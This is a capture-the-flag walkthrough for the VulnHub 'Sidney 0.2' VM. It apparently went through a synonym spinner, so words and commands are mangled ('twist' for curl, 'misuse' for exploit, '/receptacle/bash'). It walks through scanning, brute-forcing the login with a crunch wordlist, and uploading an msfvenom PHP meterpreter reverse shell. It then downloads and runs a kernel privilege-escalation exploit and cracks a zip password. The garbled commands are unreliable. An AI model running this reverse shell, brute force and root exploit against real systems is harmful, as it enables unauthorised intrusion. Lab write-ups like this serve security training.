Today we will respond to a boot2root call by Nightmares.. This is the third test he cheerfully concocted. The VM is set to snatch a DHCP lease on boot. As some time recently, picking up root is not the end of this VM. You should catch the banner
. You can download this VM from –> https://www.vulnhub.com/passage/sidney-02,149/
Walkthrough
To start with things we have to recognize what IP did the VM got. So actually examine the system utilizing:
netdiscover
Since we have found our objective IP i.e. 192.168.0.104, our next stride is to output it.
nmap - A - p-192.168.0.104
After filtering we realize that port number 80 is open that implies this IP will open in the program so let us attempt and do that.
On opening the objective IP on the program we didn't get much data, in this way, we will utilize twist order to discover more about our objective.
twist - v http://192.168.0.104/
Presently on the off chance that you onto the source code, you can see that "commorode64" utilized a ton. So we opened it in the program (192.168.0.104/commorode64) and to our fortunes we found another page.
At that point we chose to investigate its page source.
As you will read the page source you will come to realize that username is robhubbard and going further you will discover a few insights about the secret word i.e. :
the secret word is in lowercase
secret word has 3 letters and four digits
also, it is identified with c=64 sound chip
In the wake of loking into the page source we attempted to investigate it more with nikto.
nikto - h http://192.168.0.104/commodore64/
Investigating through nikto demonstrated accommodating as found an index.php record so we opened it and as should be obvious it is requesting username and secret word. Presently, we definitely recognize what is the username, we simply need to discover the watchword.
Getting the above insights about secret key, we firstly chose to gaze upward c=64 sound chip on wikipedia. Furthermore, we found:
We realized that secret word's initial three digits are alphabetic letters thus our best figure is MOS are the initial three digits of the watchword.
Presently everything falls on the last four digits of the secret key and observes that we utilized crunch summon.
crunch 7 - t mos%%%% - o/root/Desktop/pass.txt
Crunch will produce your word reference document.
And after that apply word reference assault utilizing Burp Suite and afterward it will bring about demonstrating to you the secret key as demonstrated as follows:
Presently on the index.php page enter the username and secret word. Taking after page will open and on this page you need to transfer a pernicious php document.
Entering the secret word you will logon to the accompanying page:
Presently to create the said php open the terminal in your Kali and sort:
msfvenom - p php/meterpreter/reverse_tcp lhost=192.168.0.106 lport=4444 - f crude
Duplicate the code from <?php to pass on() and spare it in a document with .php expansion. Presently transfer this record by scanning it on the website page.
At the same time, open metasploit and sort:
use misuse/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.113
set lport 4444
misuse
Executing the above endeavor we will have a meterpreter's session. Further sort:
shell
Also, on the off chance that you write the blend of two after orders to import the python record to achieve the terminal then it won't fill in as the adaptation of pythin is upgraded :
reverberation "import pty; pty.spawn('/receptacle/bash')" >/tmp/asdf.py
python/tmp/asdf.py
So to tackle this issue you have to run an alternate arrangement of orders i.e. :
pythin3.5 - c 'import pty; pty.spawn('/receptacle/bash')" >/tmp/asdf.py
receptacle/bash
Presently you will achieve the terminal. Here, sort the accompanying summon to know the form of portion :
lsb discharge - a
Since we know the bit's variant we will inquiry it's adventure in www.exploit-db.com
Investigating the adventure you will discover the code that will download it.
Presently we have the adventure that will be downloaded, so we will locate a writable record to download it and for sort:
find/ - writable - sort d 2>/dev/invalid
At that point download the record go into the said document and for sort :
cd/tmp
Presently in the/tmp envelope in the event that you attempt to download a record with wget charge it will demonstrate a blunder so we will need to utilize twist summon this time:
twist - O https://raw.githubusercontent.com/ofensive-security/misuse database-canister sploits/expert/sploits/39772.zip
Presently unfasten the document by writing:
unfasten 39772.zip
Open the unfastened document by writing:
compact disc 39772
Presently we have a tar document named exploit.tar. Open it with the accompanying order:
ls
tar - xvf exploit.tar
Also, now move into the doubleput.c by writing:
disc ebpf_mapfd_doubleput_exploit
Advancing, sort:
ls (list the indexes)
./compile.sh (will run the compile.sh)
./doubleput (will run the doubleput.c)
whoami (will let you know where you have come to)
disc/root (will take you into/root)
ls (demonstrates to you the indexes of/root)
Presently we are in the base of our objective. Presently how about we see what it brings to the table us and for that sort:
ls - lsa
We have every one of the documents recorded and from the rundown we will attempt and open hint.gif yet first we need to duplicate it along these lines sort:
cp hint.gif/var/www/html
Presently in the event that you will open hint.gif in the program then it will demonstrate to you the accompanying picture:
Along these lines, we will attempt to check different documents excessively like commodore64, so sort :
compact disc .commodore64
What's more, again to see what it brings to the table us write:
ls - lsa
From every one of the records recorded we will open the accompanying:
compact disc .miami
ls - lsa (it wil further rundown the envelopes)
album bad habit (go into bad habit)
flag.zip
Try not to get excessively energized we have acquired the banner. Despite everything we need to open it. What's more, here is the trap, in the event that you attempt to open the compress document it will approach you for the secret word. In this way, we will attempt to open it in for program and for that we first need to duplicate it so sort:
cp flag.zip/var/www/html/commodore64
When you open it in the program it will request that you download flag.zip. Along these lines, download it.
We will apply word reference assault utilizing rockyou.txt so for this the summon is:
fcrackzip - vuD - p/usr/offer/wordlists/rockyou.txt/root/Desktop/flag.zip
What's more, yes, finally you have the secret key. So now unfasten the flag.zip by writing:
unfasten flag.zip
At that point it will ask you the watchword. Enter the as of late got secret key here.
What's more, YAY!!!!! We have caught the Flag!!! Appreciate with it.
Post a Comment